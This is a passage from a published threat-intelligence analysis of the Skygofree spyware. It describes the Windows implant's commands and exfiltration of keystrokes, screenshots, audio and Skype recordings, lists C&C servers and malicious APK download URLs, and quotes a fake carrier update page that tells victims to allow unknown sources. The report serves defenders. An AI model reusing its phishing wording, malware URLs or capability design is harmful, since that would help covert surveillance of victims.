'Software\\Microsoft\\Windows\\CurrentVersion\\Run' registry key to enable autostart of the main module.\n\nThe code contains multiple comments in Italian, here is the most noteworthy example:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-19.png)](<https://securelist.com/files/2018/01/180115-skygofree-19.png>)\n\n_\"Receive commands from the remote server, here you can set the key commands to command the virus\"_\n\nHere are the available commands:\n\n| **Name** | **Description** \n---|--- \ncd | Change current directory to specified \nquit | Close the socket \nnggexe | Execute received command via Python's subprocess.Popen() without outputs \nngguploads | Upload specified file to the specified URL \nnggdownloads | Download content from the specified URLs and save to specified file \nnggfilesystem | Dump file structure of the C: path, save it to the file in json format and zip it \nnggstart_screen \nnggstop_screen | Enable/disable screenshot module. When enabled, it makes a screenshot every 25 seconds \nnggstart_key \nnggstop_key | Enable/disable keylogging module \nnggstart_rec \nnggstop_rec | Enable/disable surrounding sounds recording module \nngg_status | Send components status to the C&C socket \n*any other* | Execute received command via Python's subprocess.Popen(), output result will be sent to the C&C socket. \n \nAll modules set hidden attributes to their files:\n\n**Module** | **Paths** | **Exfiltrated data format** \n---|---|--- \nmsconf.exe | %APPDATA%/myupd/gen/ | %Y%m%d-%H%M%S_filesystem.zip (file structure dump) \nsystem.exe | %APPDATA%/myupd/aud/ | %d%m%Y%H%M%S.wav (surrounding sounds) \nupdate.exe | %APPDATA%/myupd_tmp/txt/ \n%APPDATA%/myupd/txt/ | %Y%m%d-%H%M%S.txt (keylogging) \nwow.exe | %APPDATA%/myupd/scr/ | %Y%m%d-%H%M%S.jpg (screenshots) \nskype_sync2.exe | %APPDATA%/myupd_tmp/skype/ \n%APPDATA%/myupd/skype/ | yyyyMMddHHmmss_in.mp3 \nyyyyMMddHHmmss_out.mp3 \n(skype calls records) \n \nMoreover, we found one module written in .Net - skype_sync2.exe. The main purpose of this module is to exfiltrate Skype call recordings. Just like the previous modules, it contains multiple strings in Italian.\n\nAfter launch, it downloads a codec for MP3 encoding directly from the C&C server:\n\n_http://54.67.109.199/skype_resource/libmp3lame.dll_\n\nThe skype_sync2.exe module has a compilation timestamp - Feb 06 2017 and the following PDB string:\n\n_\\\\\\vmware-host\\Shared \nFolders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb_\n\nnetwork.exe is a module for submitting all exfiltrated data to the server. In the observed version of the implant it doesn't have an interface to work with the skype_sync2.exe module.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-20.png)](<https://securelist.com/files/2018/01/180115-skygofree-20.png>)\n\n_network.exe submitting to the server code snippet_\n\n#### Code similarities\n\nWe found some code similarities between the implant for Windows and other public accessible projects.\n\n * https://github.com/El3ct71k/Keylogger/\n\nIt appears the developers have copied the functional part of the keylogger module from this project.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-21.png)](<https://securelist.com/files/2018/01/180115-skygofree-21.png>)\n\n_update.exe module and Keylogger by 'El3ct71k' code comparison_\n\n * [Xenotix Python Keylogger](<https://github.com/ajinabraham/Xenotix-Python-Keylogger/>) including specified mutex 'mutex_var_xboz'.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-22.png)](<https://securelist.com/files/2018/01/180115-skygofree-22.png>)\n\n_update.exe module and Xenotix Python Keylogger code comparison_\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-23.png)](<https://securelist.com/files/2018/01/180115-skygofree-23.png>)\n\n_'addStartup' method from msconf.exe module_\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-24.png)](<https://securelist.com/files/2018/01/180115-skygofree-24.png>)\n\n_'addStartup' method from Xenotix Python Keylogger_\n\n## Distribution\n\nWe found several landing pages that spread the Android implants.\n\n**Malicious URL** | **Referrer** | **Dates** \n---|---|--- \nhttp://217.194.13.133/tre/internet/Configuratore_3.apk | http://217.194.13.133/tre/internet/ | 2015-02-04 to \npresent time \nhttp://217.194.13.133/appPro_AC.apk | - | 2015-07-01 \nhttp://217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk | http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html | 2015-01-20 to \npresent time \nhttp://217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone%20Configuratore.apk | http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html | currently active \nhttp://vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk | http://vodafoneinfinity.sytes.net/tim/internet/ | 2015-03-04 \nhttp://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk | http://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ | 2015-01-14 \nhttp://windupdate.serveftp.com/wind/LTE/WIND%20Configuratore%20v5_4_2.apk | http://windupdate.serveftp.com/wind/LTE/ | 2015-03-31 \nhttp://119.network/lte/Internet-TIM-4G-LTE.apk | http://119.network/lte/download.html | 2015-02-04 \n2015-07-20 \nhttp://119.network/lte/Configuratore_TIM.apk | 2015-07-08 \n \nMany of these domains are outdated, but almost all (except one - appPro_AC.apk) samples located on the 217.194.13.133 server are still accessible. All the observed landing pages mimic the mobile operators' web pages through their domain name and web page content as well.\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-25.png)](<https://securelist.com/files/2018/01/180115-skygofree-25.png>)\n\n_Landing web pages that mimic the Vodafone and Three mobile operator sites_\n\nNETWORK CONFIGURATION \n** AGG. 2.3.2015 *** \nDear Customer, in order to avoid malfunctions to your internet connection, we encourage you to upgrade your configuration. Download the update now and keep on navigating at maximum speed! \nDOWNLOAD NOW \nDo you doubt how to configure your smartphone? \nFollow the simple steps below and enter the Vodafone Fast Network. \nInstallation Guide \nDownload \nClick on the DOWNLOAD button you will find on this page and download the application on your smartphone. \nSet your Smartphone \nGo to Settings-> Security for your device and put a check mark on Unknown Sources (some models are called Sources Unknown). \nInstall \nGo to notifications on your device (or directly in the Downloads folder) and click Vodafone Configuration Update to install. \nTry high speed \nRestart your device and wait for confirmation sms. Your smartphone is now configured.\n\nFurther research of the attacker's infrastructure revealed more related mimicking domains.\n\nUnfortunately, for now we can't say in what environment these landing pages were used in the wild, but according to all the information at our dsiposal, we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks. For example, this could be when the victim's device connects to a Wi-Fi access point that is infected or controlled by the attackers.\n\n## Artifacts\n\nDuring the research, we found plenty of traces of the developers and those doing the maintaining.\n\n * As already stated in the 'malware features' part, there are multiple giveaways in the code. Here are just some of them:\n**ngglobal _- _**_FirebaseCloudMessaging topic name_ \n--- \n**Issuer: CN = negg** - _from several certificates_ \n**negg.ddns[.]net, negg1.ddns[.]net, negg2.ddns[.]net - **_C&C servers_ \n**NG SuperShell - **_string from the reverse shell payload_ \n**ngg - **_prefix in commands names of the implant for Windows_ \n \n[![](https://securelist.com/files/2018/01/180115-skygofree-26.png)](<https://securelist.com/files/2018/01/180115-skygofree-26.png>)\n\n_Signature with specific issuer_\n\n * Whois records and IP relationships provide many interesting insights as well. There are a lot of other 'Negg' mentions in Whois records and references to it. For example:\n\n[![](https://securelist.com/files/2018/01/180115-skygofree-27.png)](<https://securelist.com/files/2018/01/180115-skygofree-27.png>)\n\n## Conclusions\n\nThe Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform. As a result of the long-term development process, there are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, never-before-seen surveillance features such as recording surrounding audio in specified locations.\n\nGiven the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam.\n\n##### Notes\n\n*Skygofree has no connection to Sky, Sky Go or any other subsidiary of Sky, and does not affect the Sky Go service or app.\n\n[![](https://securelist.com/files/2012/08/pdf_small5.gif) **Skygofree Appendix \u2014 Indicators of Compromise (PDF)**](<https://securelist.com/files/2018/01/Skygofree_appendix_eng.pdf>)", "modified": "2018-01-16T10:00:58", "published": "2018-01-16T10:00:58", "href": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", "id": "SECURELIST:52B19EC96333D6EAA616F8D528A8E64A", "type": "securelist", "title": "Skygofree: Following in the footsteps of HackingTeam", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}